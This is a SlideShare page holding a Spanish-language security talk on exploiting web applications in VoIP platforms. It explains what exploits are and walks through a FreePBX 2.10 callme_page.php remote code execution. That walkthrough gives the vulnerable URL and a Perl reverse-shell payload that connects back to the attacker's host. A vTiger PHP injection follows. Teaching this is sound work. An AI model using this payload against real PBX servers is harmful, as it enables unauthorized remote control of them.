SlideShare uma empresa Scribd logo
1 de 36
Baixar para ler offline
Web Exploiting
and
Reversing Shell
In
VoIP Plataforms
$ Whois @jroliva
Juan Oliva
C|EH, CPTE, OSEH, BNS, dCAA, ECE, LPIC-1, Novell CLA
Proyectos de Ethical Hacking
Proyectos de Voz sobre IP.
Blog : jroliva.wordpress.com
Instructor
- Certificación Linux Professional Institute LPI-C1
- Certificación de Seguridad de Elastix “ESM”
- Curso y taller Ethical Hacking y Voz sobre IP
DESCARGO DE RESPONSABILIDAD
Esta presentación tiene como propósito proveer
unicamente información. No aplicar este material ni
conocimientos sin el Consentimiento explícito que
autorice a hacerlo. Los lectores (participantes, oyentes,
videntes) asumen la responsabilidad completa por la
aplicación o experimentación de este material y/o
conocimientos presentados. El(los) autor(es) quedan
exceptuados de cualquier reclamo directo o indirecto
respecto a daños que puedan haber sido causados por
la aplicación de este material y/o conocimientos expuestos.
La información aquí expuesta representa las opiniones y
perspectivas propias del autor respecto a la materia y no
representan ninguna posicion oficial de alguna organización
asociada.
INTRODUCCION
INTRODUCCION

VULNERABILIDAD
FALLO O DEBILIDAD DE UN SISTEMA, PLATAFORMA O APLICACION
ATAQUE
COMPROMETER LA SEGURIDAD DEL SISTEMA APROBECANDONOS
DE UNA VULNERABILIDAD
CONTRAMEDIDA
ACCIONES A LLEVAR A CABO PARA EVITAR TENER VULNERABILIDADES
INTRODUCCION

VULNERABILIDADES ESPECIFICAS

- DESBORDAMIENTO DE BUFFER OVERFLOW
- DESBORDAMIENTO DE CARRERA (race condition)
- FORMATO DE CADENA (format string error)
- INYECCIONES SQL (SQL Inyection)
QUE ES UN EXPLOIT
QUE ES UN EXPLOIT

DEFINICIÓN

Un Exploit es un programa o código que "explota" una
vulnerabilidad del sistema de forma manual o totalmente
Automatizada
QUE ES UN EXPLOIT

DEFINICION

Si bien el código que explota la vulnerabilidad no es un código
malicioso en sí mismo, generalmente se utiliza para otros fines

- Acceso no autorizado a un sistema
- Malware como gusanos y troyanos.
TIPOS DE EXPLOIT
TIPOS DE EXPLOIT

REMOTOS
Los que pueden ser lanzados desde una ubicación
Diferente de la red del equipo de la victima (internet)

Si se logra su ejecución es posible tomar el control del equipo
Comprometido parcial o totalmente.
TIPOS DE EXPLOIT

LOCALES
Permiten elevar privilegios de un sistema operativo solo en la
Red local del equipo víctima
DONDE LOS ENCUENTRAN

Existen muchas páginas dónde se publican diferentes tipos
de exploits :

- exploit-db.com
- packetstormsecurity.com
- exploitsdownload.com
- cvedetails.com
COMO SE HACEN LOS EXPLOITS
COMO SE HACEN LOS EXPLOITS

HERRAMIENTAS DE DESARROLLO

Pueden ser escritos en diferentes lenguajes
Tradicionalmente se realizan en C , perl , bash , nc
COMO SE HACEN LOS EXPLOITS

HERRAMIENTAS DE DESARROLLO

Sin embargo con el desarrollo de los lenguajes y vulnerabilidades
Hoy es posible desarrollar exploits con python o PHP inclusive
EL CICLO DE VIDA
CICLO DE VIDA
CICLO DE VIDA
VIENDO APLICACIONES WEB
EXPLOTABLES EN PLATAFORMAS VOIP
APLICACIONES WEB
EXPLOTABLES EN PLATAFORMAS VOIP
FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution
Vulnerabilidad es de tipo “Remote Code Execution Exploit” ,
es decir inyecta código en una página no autentificada

variables que generan la ejecución de sentencias del sistema
operativo vía la función “system” de asterisk ,

Resultado : genera una conexión reversa desde el host
atacado hacia el host del atacante vía el puerto 443.
Pero como funciona ??
URL A LA CUAL INGRESA EL PROGRAMA:

/recordings/misc/callme_page.php?action=c&callmenum='
CODIGO QUE INYECTA

UN POCO FEO NO ???
CODIGO QUE INYECTA
str(extension) '@from-internal/n
Application: system
Data: perl -MIO -e '$p=fork;exit,if($p);
$c=new IO::Socket::INET(PeerAddr,"' str(lhost) ':' str(lport) '");
STDIN->fdopen($c,r);
$~->fdopen($c,w);system$_ while<>;'
Ahora si la veo !!
Bingo , tengo shell !!
AHORA VAMOS A LA PRACTICA
DEMO TIME !!
Exploit en Freepbx 2.10
APLICACIONES WEB
EXPLOTABLES EN PLATAFORMAS VOIP
PHP CODE INYECTION en VTIGER 5.2.1
Descripción : El fundamento básico de esta técnica, es inyectar
código arbitrario , como lo hace una inyección SQL

Resultado : Obtención de una Shell reversa.
DEMO
Exploit en VTIGER 5.2.1
Gracias !!!
Juan Oliva
Consultor en Ethical Hacking y Voip
gtalk :jroliva@gmail.com
Twiter : @jroliva
Blog : http://jroliva.wordpress.com/

Mais conteúdo relacionado

Mais procurados

Extendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con SnortExtendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con SnortJuan Oliva
 
Webinar Gratuito: Técnicas Antiforenses Básicas
Webinar Gratuito: Técnicas Antiforenses BásicasWebinar Gratuito: Técnicas Antiforenses Básicas
Webinar Gratuito: Técnicas Antiforenses BásicasAlonso Caballero
 
Elastix SIP Firewall: Una capa extra de seguridad para su PBX
Elastix SIP Firewall: Una capa extra de seguridad para su PBXElastix SIP Firewall: Una capa extra de seguridad para su PBX
Elastix SIP Firewall: Una capa extra de seguridad para su PBXPaloSanto Solutions
 
Protegiendo SIP y SSH con Fail2ban en Elastix
Protegiendo SIP y SSH con Fail2ban en ElastixProtegiendo SIP y SSH con Fail2ban en Elastix
Protegiendo SIP y SSH con Fail2ban en ElastixPaloSanto Solutions
 
Webinar Gratuito: Metasploit Framework
Webinar Gratuito: Metasploit FrameworkWebinar Gratuito: Metasploit Framework
Webinar Gratuito: Metasploit FrameworkAlonso Caballero
 
Instrucciones al alumno elx1 o1 elastix
Instrucciones al alumno elx1 o1 elastixInstrucciones al alumno elx1 o1 elastix
Instrucciones al alumno elx1 o1 elastixenriquetcampos.org
 
Elastix MT al descubierto Alfio Muñoz, Alteknativa
Elastix MT al descubierto Alfio Muñoz, AlteknativaElastix MT al descubierto Alfio Muñoz, Alteknativa
Elastix MT al descubierto Alfio Muñoz, AlteknativaElastix México
 
Administración de servidores linux-Presentacion
Administración de servidores linux-PresentacionAdministración de servidores linux-Presentacion
Administración de servidores linux-Presentaciondanilohnr
 
Administración de Servidores
Administración de ServidoresAdministración de Servidores
Administración de Servidoresjaimeccanto
 
Como proteger nuestro WordPress de ataques de fuerza en bruto
Como proteger nuestro WordPress de ataques de fuerza en brutoComo proteger nuestro WordPress de ataques de fuerza en bruto
Como proteger nuestro WordPress de ataques de fuerza en brutoPedro Santos
 
Instalación asincrónica de controladores en VMWare 6.0.X (ESXi)
Instalación asincrónica de controladores en VMWare 6.0.X (ESXi)Instalación asincrónica de controladores en VMWare 6.0.X (ESXi)
Instalación asincrónica de controladores en VMWare 6.0.X (ESXi)RaGaZoMe
 
Colegio british royal school
Colegio british royal schoolColegio british royal school
Colegio british royal schoolroman figueroa
 
Consejos para reforzar la seguridad en linux
Consejos para reforzar la seguridad en linuxConsejos para reforzar la seguridad en linux
Consejos para reforzar la seguridad en linuxDavid Thomas
 

Mais procurados (20)

Extendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con SnortExtendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con Snort
 
Webinar Gratuito: Técnicas Antiforenses Básicas
Webinar Gratuito: Técnicas Antiforenses BásicasWebinar Gratuito: Técnicas Antiforenses Básicas
Webinar Gratuito: Técnicas Antiforenses Básicas
 
Elastix SIP Firewall: Una capa extra de seguridad para su PBX
Elastix SIP Firewall: Una capa extra de seguridad para su PBXElastix SIP Firewall: Una capa extra de seguridad para su PBX
Elastix SIP Firewall: Una capa extra de seguridad para su PBX
 
Protegiendo SIP y SSH con Fail2ban en Elastix
Protegiendo SIP y SSH con Fail2ban en ElastixProtegiendo SIP y SSH con Fail2ban en Elastix
Protegiendo SIP y SSH con Fail2ban en Elastix
 
Webinar Gratuito: Metasploit Framework
Webinar Gratuito: Metasploit FrameworkWebinar Gratuito: Metasploit Framework
Webinar Gratuito: Metasploit Framework
 
Instrucciones al alumno elx1 o1 elastix
Instrucciones al alumno elx1 o1 elastixInstrucciones al alumno elx1 o1 elastix
Instrucciones al alumno elx1 o1 elastix
 
Kali linux guia español
Kali linux guia españolKali linux guia español
Kali linux guia español
 
Elastix MT al descubierto Alfio Muñoz, Alteknativa
Elastix MT al descubierto Alfio Muñoz, AlteknativaElastix MT al descubierto Alfio Muñoz, Alteknativa
Elastix MT al descubierto Alfio Muñoz, Alteknativa
 
Los navegadores CYD
Los navegadores CYDLos navegadores CYD
Los navegadores CYD
 
m0n0wall
m0n0wallm0n0wall
m0n0wall
 
Monowall
MonowallMonowall
Monowall
 
Administración de servidores linux-Presentacion
Administración de servidores linux-PresentacionAdministración de servidores linux-Presentacion
Administración de servidores linux-Presentacion
 
Foren fromt tmg
Foren fromt  tmgForen fromt  tmg
Foren fromt tmg
 
Flash player security
Flash player securityFlash player security
Flash player security
 
Administración de Servidores
Administración de ServidoresAdministración de Servidores
Administración de Servidores
 
Como proteger nuestro WordPress de ataques de fuerza en bruto
Como proteger nuestro WordPress de ataques de fuerza en brutoComo proteger nuestro WordPress de ataques de fuerza en bruto
Como proteger nuestro WordPress de ataques de fuerza en bruto
 
Instalación asincrónica de controladores en VMWare 6.0.X (ESXi)
Instalación asincrónica de controladores en VMWare 6.0.X (ESXi)Instalación asincrónica de controladores en VMWare 6.0.X (ESXi)
Instalación asincrónica de controladores en VMWare 6.0.X (ESXi)
 
Troston
TrostonTroston
Troston
 
Colegio british royal school
Colegio british royal schoolColegio british royal school
Colegio british royal school
 
Consejos para reforzar la seguridad en linux
Consejos para reforzar la seguridad en linuxConsejos para reforzar la seguridad en linux
Consejos para reforzar la seguridad en linux
 

Semelhante a Web Exploiting Shells in VoIP Platforms

Kali linux guia español
Kali linux guia españolKali linux guia español
Kali linux guia españolIt-servicios
 
Kali linux guia español
Kali linux guia españolKali linux guia español
Kali linux guia españolKrls Avilez
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informaticawalteraguero
 
Webinar Gratuito: Crear un Medio Infectado con Metasploit Framework
Webinar Gratuito: Crear un Medio Infectado con Metasploit FrameworkWebinar Gratuito: Crear un Medio Infectado con Metasploit Framework
Webinar Gratuito: Crear un Medio Infectado con Metasploit FrameworkAlonso Caballero
 
Metasploit - Bypass UAC fodhelper [Post-explotación]
Metasploit - Bypass UAC fodhelper [Post-explotación]Metasploit - Bypass UAC fodhelper [Post-explotación]
Metasploit - Bypass UAC fodhelper [Post-explotación]Adrián Lois
 
Webinar Gratuito: Metasploit Framework
Webinar Gratuito: Metasploit FrameworkWebinar Gratuito: Metasploit Framework
Webinar Gratuito: Metasploit FrameworkAlonso Caballero
 
Curso Virtual de Hacking Linux
Curso Virtual de Hacking LinuxCurso Virtual de Hacking Linux
Curso Virtual de Hacking LinuxAlonso Caballero
 
Presentacion re y_des_09072003
Presentacion re y_des_09072003Presentacion re y_des_09072003
Presentacion re y_des_09072003Alonso Caballero
 
Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"
Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"
Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"Alonso Caballero
 
Vc4 nm73 equipo#6-exploit
Vc4 nm73 equipo#6-exploitVc4 nm73 equipo#6-exploit
Vc4 nm73 equipo#6-exploitSaMoCaFlo
 
Malware en Linux - Barcamp SE - Cali, Colombia 2013
Malware en Linux - Barcamp SE - Cali, Colombia 2013Malware en Linux - Barcamp SE - Cali, Colombia 2013
Malware en Linux - Barcamp SE - Cali, Colombia 2013Alejandro Hernández
 
Vc4 nm73 equipo#6-exploit
Vc4 nm73 equipo#6-exploitVc4 nm73 equipo#6-exploit
Vc4 nm73 equipo#6-exploitYare LoZada
 
Webinar Gratuito: "Nikto para Pentesting"
Webinar Gratuito: "Nikto para Pentesting"Webinar Gratuito: "Nikto para Pentesting"
Webinar Gratuito: "Nikto para Pentesting"Alonso Caballero
 
Ethical hacking 01
Ethical hacking 01Ethical hacking 01
Ethical hacking 01Tensor
 
Samurai Web Testing Framework 2.0
Samurai Web Testing Framework 2.0Samurai Web Testing Framework 2.0
Samurai Web Testing Framework 2.0Alonso Caballero
 
Plone CMS en el Proyecto CANAIMA GNU/Linux
Plone CMS en el Proyecto CANAIMA GNU/LinuxPlone CMS en el Proyecto CANAIMA GNU/Linux
Plone CMS en el Proyecto CANAIMA GNU/LinuxLeonardo J. Caballero G.
 
Juan Oliva - Seguridad Preventiva y Reactiva en VoIP
Juan Oliva - Seguridad Preventiva y Reactiva en VoIPJuan Oliva - Seguridad Preventiva y Reactiva en VoIP
Juan Oliva - Seguridad Preventiva y Reactiva en VoIPElastixCom
 
Malware en linux
Malware en linuxMalware en linux
Malware en linuxTensor
 

Semelhante a Web Exploiting Shells in VoIP Platforms (20)

Kali linux guia español
Kali linux guia españolKali linux guia español
Kali linux guia español
 
Kali linux guia español
Kali linux guia españolKali linux guia español
Kali linux guia español
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Webinar Gratuito: Crear un Medio Infectado con Metasploit Framework
Webinar Gratuito: Crear un Medio Infectado con Metasploit FrameworkWebinar Gratuito: Crear un Medio Infectado con Metasploit Framework
Webinar Gratuito: Crear un Medio Infectado con Metasploit Framework
 
Metasploit - Bypass UAC fodhelper [Post-explotación]
Metasploit - Bypass UAC fodhelper [Post-explotación]Metasploit - Bypass UAC fodhelper [Post-explotación]
Metasploit - Bypass UAC fodhelper [Post-explotación]
 
Webinar Gratuito: Metasploit Framework
Webinar Gratuito: Metasploit FrameworkWebinar Gratuito: Metasploit Framework
Webinar Gratuito: Metasploit Framework
 
Curso Virtual de Hacking Linux
Curso Virtual de Hacking LinuxCurso Virtual de Hacking Linux
Curso Virtual de Hacking Linux
 
Presentacion re y_des_09072003
Presentacion re y_des_09072003Presentacion re y_des_09072003
Presentacion re y_des_09072003
 
Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"
Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"
Webinar Gratuito: "Maquinas Vulnerables para Hacking Web"
 
VC4NM73-EQ#6-EXPLOIT
VC4NM73-EQ#6-EXPLOITVC4NM73-EQ#6-EXPLOIT
VC4NM73-EQ#6-EXPLOIT
 
Linux Corporativo
Linux CorporativoLinux Corporativo
Linux Corporativo
 
Vc4 nm73 equipo#6-exploit
Vc4 nm73 equipo#6-exploitVc4 nm73 equipo#6-exploit
Vc4 nm73 equipo#6-exploit
 
Malware en Linux - Barcamp SE - Cali, Colombia 2013
Malware en Linux - Barcamp SE - Cali, Colombia 2013Malware en Linux - Barcamp SE - Cali, Colombia 2013
Malware en Linux - Barcamp SE - Cali, Colombia 2013
 
Vc4 nm73 equipo#6-exploit
Vc4 nm73 equipo#6-exploitVc4 nm73 equipo#6-exploit
Vc4 nm73 equipo#6-exploit
 
Webinar Gratuito: "Nikto para Pentesting"
Webinar Gratuito: "Nikto para Pentesting"Webinar Gratuito: "Nikto para Pentesting"
Webinar Gratuito: "Nikto para Pentesting"
 
Ethical hacking 01
Ethical hacking 01Ethical hacking 01
Ethical hacking 01
 
Samurai Web Testing Framework 2.0
Samurai Web Testing Framework 2.0Samurai Web Testing Framework 2.0
Samurai Web Testing Framework 2.0
 
Plone CMS en el Proyecto CANAIMA GNU/Linux
Plone CMS en el Proyecto CANAIMA GNU/LinuxPlone CMS en el Proyecto CANAIMA GNU/Linux
Plone CMS en el Proyecto CANAIMA GNU/Linux
 
Juan Oliva - Seguridad Preventiva y Reactiva en VoIP
Juan Oliva - Seguridad Preventiva y Reactiva en VoIPJuan Oliva - Seguridad Preventiva y Reactiva en VoIP
Juan Oliva - Seguridad Preventiva y Reactiva en VoIP
 
Malware en linux
Malware en linuxMalware en linux
Malware en linux
 

Mais de Juan Oliva

Usando el módulo PIKE en Elastix MT
Usando el módulo PIKE en Elastix MTUsando el módulo PIKE en Elastix MT
Usando el módulo PIKE en Elastix MTJuan Oliva
 
Seguridad VoIP en Open Source - Poniendo el punto sobre la Í
Seguridad VoIP en Open Source -  Poniendo el punto sobre la ÍSeguridad VoIP en Open Source -  Poniendo el punto sobre la Í
Seguridad VoIP en Open Source - Poniendo el punto sobre la ÍJuan Oliva
 
Implementando Seguridad en plataformas de software libre Elastix
Implementando Seguridad en plataformas de software libre ElastixImplementando Seguridad en plataformas de software libre Elastix
Implementando Seguridad en plataformas de software libre ElastixJuan Oliva
 
CiberSeguridad Ataques informáticos están cambiando el mundo
CiberSeguridad Ataques informáticos están cambiando el mundoCiberSeguridad Ataques informáticos están cambiando el mundo
CiberSeguridad Ataques informáticos están cambiando el mundoJuan Oliva
 
Linux tools para_atacar y defender
Linux tools para_atacar y defenderLinux tools para_atacar y defender
Linux tools para_atacar y defenderJuan Oliva
 
Elastix SIP FIREWALL
Elastix SIP FIREWALLElastix SIP FIREWALL
Elastix SIP FIREWALLJuan Oliva
 
Seguridad en implementaciones de VoIP
Seguridad en implementaciones de VoIPSeguridad en implementaciones de VoIP
Seguridad en implementaciones de VoIPJuan Oliva
 
Escarbando en el módulo Security de Elastix
Escarbando en el módulo Security de ElastixEscarbando en el módulo Security de Elastix
Escarbando en el módulo Security de ElastixJuan Oliva
 

Mais de Juan Oliva (8)

Usando el módulo PIKE en Elastix MT
Usando el módulo PIKE en Elastix MTUsando el módulo PIKE en Elastix MT
Usando el módulo PIKE en Elastix MT
 
Seguridad VoIP en Open Source - Poniendo el punto sobre la Í
Seguridad VoIP en Open Source -  Poniendo el punto sobre la ÍSeguridad VoIP en Open Source -  Poniendo el punto sobre la Í
Seguridad VoIP en Open Source - Poniendo el punto sobre la Í
 
Implementando Seguridad en plataformas de software libre Elastix
Implementando Seguridad en plataformas de software libre ElastixImplementando Seguridad en plataformas de software libre Elastix
Implementando Seguridad en plataformas de software libre Elastix
 
CiberSeguridad Ataques informáticos están cambiando el mundo
CiberSeguridad Ataques informáticos están cambiando el mundoCiberSeguridad Ataques informáticos están cambiando el mundo
CiberSeguridad Ataques informáticos están cambiando el mundo
 
Linux tools para_atacar y defender
Linux tools para_atacar y defenderLinux tools para_atacar y defender
Linux tools para_atacar y defender
 
Elastix SIP FIREWALL
Elastix SIP FIREWALLElastix SIP FIREWALL
Elastix SIP FIREWALL
 
Seguridad en implementaciones de VoIP
Seguridad en implementaciones de VoIPSeguridad en implementaciones de VoIP
Seguridad en implementaciones de VoIP
 
Escarbando en el módulo Security de Elastix
Escarbando en el módulo Security de ElastixEscarbando en el módulo Security de Elastix
Escarbando en el módulo Security de Elastix
 

Último

Slideshare y Scribd - Noli Cubillan Gerencia
Slideshare y Scribd - Noli Cubillan GerenciaSlideshare y Scribd - Noli Cubillan Gerencia
Slideshare y Scribd - Noli Cubillan Gerenciacubillannoly
 
Trabajo de tecnología excel avanzado.pdf
Trabajo de tecnología excel avanzado.pdfTrabajo de tecnología excel avanzado.pdf
Trabajo de tecnología excel avanzado.pdfedepmariaperez
 
#Tare10ProgramacionWeb2024aaaaaaaaaaaa.pptx
#Tare10ProgramacionWeb2024aaaaaaaaaaaa.pptx#Tare10ProgramacionWeb2024aaaaaaaaaaaa.pptx
#Tare10ProgramacionWeb2024aaaaaaaaaaaa.pptxHugoGutierrez99
 
Herramientas que posibilitan la información y la investigación.pdf
Herramientas que posibilitan la información y la investigación.pdfHerramientas que posibilitan la información y la investigación.pdf
Herramientas que posibilitan la información y la investigación.pdfKarinaCambero3
 
Análisis de los artefactos (nintendo NES)
Análisis de los artefactos (nintendo NES)Análisis de los artefactos (nintendo NES)
Análisis de los artefactos (nintendo NES)JuanStevenTrujilloCh
 
Trabajo de Tecnología .pdfywhwhejsjsjsjsjsk
Trabajo de Tecnología .pdfywhwhejsjsjsjsjskTrabajo de Tecnología .pdfywhwhejsjsjsjsjsk
Trabajo de Tecnología .pdfywhwhejsjsjsjsjskbydaniela5
 
PLANEACION DE CLASES TEMA TIPOS DE FAMILIA.docx
PLANEACION DE CLASES TEMA TIPOS DE FAMILIA.docxPLANEACION DE CLASES TEMA TIPOS DE FAMILIA.docx
PLANEACION DE CLASES TEMA TIPOS DE FAMILIA.docxhasbleidit
 
Trabajo de tecnología liceo departamental
Trabajo de tecnología liceo departamentalTrabajo de tecnología liceo departamental
Trabajo de tecnología liceo departamentalEmanuelCastro64
 
Tecnología Educativa- presentación maestría
Tecnología Educativa- presentación maestríaTecnología Educativa- presentación maestría
Tecnología Educativa- presentación maestríaElizabethLpezSoto
 
Actividades de computación para alumnos de preescolar
Actividades de computación para alumnos de preescolarActividades de computación para alumnos de preescolar
Actividades de computación para alumnos de preescolar24roberto21
 
Clasificación de Conjuntos de Datos Desequilibrados.pptx
Clasificación de Conjuntos de Datos Desequilibrados.pptxClasificación de Conjuntos de Datos Desequilibrados.pptx
Clasificación de Conjuntos de Datos Desequilibrados.pptxCarolina Bujaico
 
TALLER DE ANALISIS SOLUCION PART 2 (1)-1.docx
TALLER DE ANALISIS SOLUCION  PART 2 (1)-1.docxTALLER DE ANALISIS SOLUCION  PART 2 (1)-1.docx
TALLER DE ANALISIS SOLUCION PART 2 (1)-1.docxobandopaula444
 
ORIENTACIONES DE INFORMÁTICA-2024.pdf-guia
ORIENTACIONES DE INFORMÁTICA-2024.pdf-guiaORIENTACIONES DE INFORMÁTICA-2024.pdf-guia
ORIENTACIONES DE INFORMÁTICA-2024.pdf-guiaYeimys Ch
 
PROYECCIÓN DE VISTAS planos de vistas y mas
PROYECCIÓN DE VISTAS planos de vistas y masPROYECCIÓN DE VISTAS planos de vistas y mas
PROYECCIÓN DE VISTAS planos de vistas y maslida630411
 
Guía de Registro slideshare paso a paso 1
Guía de Registro slideshare paso a paso 1Guía de Registro slideshare paso a paso 1
Guía de Registro slideshare paso a paso 1ivanapaterninar
 
Trabajando con Formasy Smart art en power Point
Trabajando con Formasy Smart art en power PointTrabajando con Formasy Smart art en power Point
Trabajando con Formasy Smart art en power PointValerioIvanDePazLoja
 
TENDENCIAS DE IA Inteligencia artificial generativa.pdf
TENDENCIAS DE IA Inteligencia artificial generativa.pdfTENDENCIAS DE IA Inteligencia artificial generativa.pdf
TENDENCIAS DE IA Inteligencia artificial generativa.pdfJoseAlejandroPerezBa
 
certificado de oracle academy cetrificado.pdf
certificado de oracle academy cetrificado.pdfcertificado de oracle academy cetrificado.pdf
certificado de oracle academy cetrificado.pdfFernandoOblitasVivan
 
La electricidad y la electronica.10-7.pdf
La electricidad y la electronica.10-7.pdfLa electricidad y la electronica.10-7.pdf
La electricidad y la electronica.10-7.pdfcristianrb0324
 
CommitConf 2024 - Spring Boot <3 Testcontainers
CommitConf 2024 - Spring Boot <3 TestcontainersCommitConf 2024 - Spring Boot <3 Testcontainers
CommitConf 2024 - Spring Boot <3 TestcontainersIván López Martín
 

Último (20)

Slideshare y Scribd - Noli Cubillan Gerencia
Slideshare y Scribd - Noli Cubillan GerenciaSlideshare y Scribd - Noli Cubillan Gerencia
Slideshare y Scribd - Noli Cubillan Gerencia
 
Trabajo de tecnología excel avanzado.pdf
Trabajo de tecnología excel avanzado.pdfTrabajo de tecnología excel avanzado.pdf
Trabajo de tecnología excel avanzado.pdf
 
#Tare10ProgramacionWeb2024aaaaaaaaaaaa.pptx
#Tare10ProgramacionWeb2024aaaaaaaaaaaa.pptx#Tare10ProgramacionWeb2024aaaaaaaaaaaa.pptx
#Tare10ProgramacionWeb2024aaaaaaaaaaaa.pptx
 
Herramientas que posibilitan la información y la investigación.pdf
Herramientas que posibilitan la información y la investigación.pdfHerramientas que posibilitan la información y la investigación.pdf
Herramientas que posibilitan la información y la investigación.pdf
 
Análisis de los artefactos (nintendo NES)
Análisis de los artefactos (nintendo NES)Análisis de los artefactos (nintendo NES)
Análisis de los artefactos (nintendo NES)
 
Trabajo de Tecnología .pdfywhwhejsjsjsjsjsk
Trabajo de Tecnología .pdfywhwhejsjsjsjsjskTrabajo de Tecnología .pdfywhwhejsjsjsjsjsk
Trabajo de Tecnología .pdfywhwhejsjsjsjsjsk
 
PLANEACION DE CLASES TEMA TIPOS DE FAMILIA.docx
PLANEACION DE CLASES TEMA TIPOS DE FAMILIA.docxPLANEACION DE CLASES TEMA TIPOS DE FAMILIA.docx
PLANEACION DE CLASES TEMA TIPOS DE FAMILIA.docx
 
Trabajo de tecnología liceo departamental
Trabajo de tecnología liceo departamentalTrabajo de tecnología liceo departamental
Trabajo de tecnología liceo departamental
 
Tecnología Educativa- presentación maestría
Tecnología Educativa- presentación maestríaTecnología Educativa- presentación maestría
Tecnología Educativa- presentación maestría
 
Actividades de computación para alumnos de preescolar
Actividades de computación para alumnos de preescolarActividades de computación para alumnos de preescolar
Actividades de computación para alumnos de preescolar
 
Clasificación de Conjuntos de Datos Desequilibrados.pptx
Clasificación de Conjuntos de Datos Desequilibrados.pptxClasificación de Conjuntos de Datos Desequilibrados.pptx
Clasificación de Conjuntos de Datos Desequilibrados.pptx
 
TALLER DE ANALISIS SOLUCION PART 2 (1)-1.docx
TALLER DE ANALISIS SOLUCION  PART 2 (1)-1.docxTALLER DE ANALISIS SOLUCION  PART 2 (1)-1.docx
TALLER DE ANALISIS SOLUCION PART 2 (1)-1.docx
 
ORIENTACIONES DE INFORMÁTICA-2024.pdf-guia
ORIENTACIONES DE INFORMÁTICA-2024.pdf-guiaORIENTACIONES DE INFORMÁTICA-2024.pdf-guia
ORIENTACIONES DE INFORMÁTICA-2024.pdf-guia
 
PROYECCIÓN DE VISTAS planos de vistas y mas
PROYECCIÓN DE VISTAS planos de vistas y masPROYECCIÓN DE VISTAS planos de vistas y mas
PROYECCIÓN DE VISTAS planos de vistas y mas
 
Guía de Registro slideshare paso a paso 1
Guía de Registro slideshare paso a paso 1Guía de Registro slideshare paso a paso 1
Guía de Registro slideshare paso a paso 1
 
Trabajando con Formasy Smart art en power Point
Trabajando con Formasy Smart art en power PointTrabajando con Formasy Smart art en power Point
Trabajando con Formasy Smart art en power Point
 
TENDENCIAS DE IA Inteligencia artificial generativa.pdf
TENDENCIAS DE IA Inteligencia artificial generativa.pdfTENDENCIAS DE IA Inteligencia artificial generativa.pdf
TENDENCIAS DE IA Inteligencia artificial generativa.pdf
 
certificado de oracle academy cetrificado.pdf
certificado de oracle academy cetrificado.pdfcertificado de oracle academy cetrificado.pdf
certificado de oracle academy cetrificado.pdf
 
La electricidad y la electronica.10-7.pdf
La electricidad y la electronica.10-7.pdfLa electricidad y la electronica.10-7.pdf
La electricidad y la electronica.10-7.pdf
 
CommitConf 2024 - Spring Boot <3 Testcontainers
CommitConf 2024 - Spring Boot <3 TestcontainersCommitConf 2024 - Spring Boot <3 Testcontainers
CommitConf 2024 - Spring Boot <3 Testcontainers
 

Web Exploiting Shells in VoIP Platforms

  • 2. $ Whois @jroliva Juan Oliva C|EH, CPTE, OSEH, BNS, dCAA, ECE, LPIC-1, Novell CLA Proyectos de Ethical Hacking Proyectos de Voz sobre IP. Blog : jroliva.wordpress.com Instructor - Certificación Linux Professional Institute LPI-C1 - Certificación de Seguridad de Elastix “ESM” - Curso y taller Ethical Hacking y Voz sobre IP
  • 3. DESCARGO DE RESPONSABILIDAD Esta presentación tiene como propósito proveer unicamente información. No aplicar este material ni conocimientos sin el Consentimiento explícito que autorice a hacerlo. Los lectores (participantes, oyentes, videntes) asumen la responsabilidad completa por la aplicación o experimentación de este material y/o conocimientos presentados. El(los) autor(es) quedan exceptuados de cualquier reclamo directo o indirecto respecto a daños que puedan haber sido causados por la aplicación de este material y/o conocimientos expuestos. La información aquí expuesta representa las opiniones y perspectivas propias del autor respecto a la materia y no representan ninguna posicion oficial de alguna organización asociada.
  • 5. INTRODUCCION VULNERABILIDAD FALLO O DEBILIDAD DE UN SISTEMA, PLATAFORMA O APLICACION ATAQUE COMPROMETER LA SEGURIDAD DEL SISTEMA APROBECANDONOS DE UNA VULNERABILIDAD CONTRAMEDIDA ACCIONES A LLEVAR A CABO PARA EVITAR TENER VULNERABILIDADES
  • 6. INTRODUCCION VULNERABILIDADES ESPECIFICAS - DESBORDAMIENTO DE BUFFER OVERFLOW - DESBORDAMIENTO DE CARRERA (race condition) - FORMATO DE CADENA (format string error) - INYECCIONES SQL (SQL Inyection)
  • 7. QUE ES UN EXPLOIT
  • 8. QUE ES UN EXPLOIT DEFINICIÓN Un Exploit es un programa o código que "explota" una vulnerabilidad del sistema de forma manual o totalmente Automatizada
  • 9. QUE ES UN EXPLOIT DEFINICION Si bien el código que explota la vulnerabilidad no es un código malicioso en sí mismo, generalmente se utiliza para otros fines - Acceso no autorizado a un sistema - Malware como gusanos y troyanos.
  • 11. TIPOS DE EXPLOIT REMOTOS Los que pueden ser lanzados desde una ubicación Diferente de la red del equipo de la victima (internet) Si se logra su ejecución es posible tomar el control del equipo Comprometido parcial o totalmente.
  • 12. TIPOS DE EXPLOIT LOCALES Permiten elevar privilegios de un sistema operativo solo en la Red local del equipo víctima
  • 13. DONDE LOS ENCUENTRAN Existen muchas páginas dónde se publican diferentes tipos de exploits : - exploit-db.com - packetstormsecurity.com - exploitsdownload.com - cvedetails.com
  • 14. COMO SE HACEN LOS EXPLOITS
  • 15. COMO SE HACEN LOS EXPLOITS HERRAMIENTAS DE DESARROLLO Pueden ser escritos en diferentes lenguajes Tradicionalmente se realizan en C , perl , bash , nc
  • 16. COMO SE HACEN LOS EXPLOITS HERRAMIENTAS DE DESARROLLO Sin embargo con el desarrollo de los lenguajes y vulnerabilidades Hoy es posible desarrollar exploits con python o PHP inclusive
  • 17. EL CICLO DE VIDA
  • 20. VIENDO APLICACIONES WEB EXPLOTABLES EN PLATAFORMAS VOIP
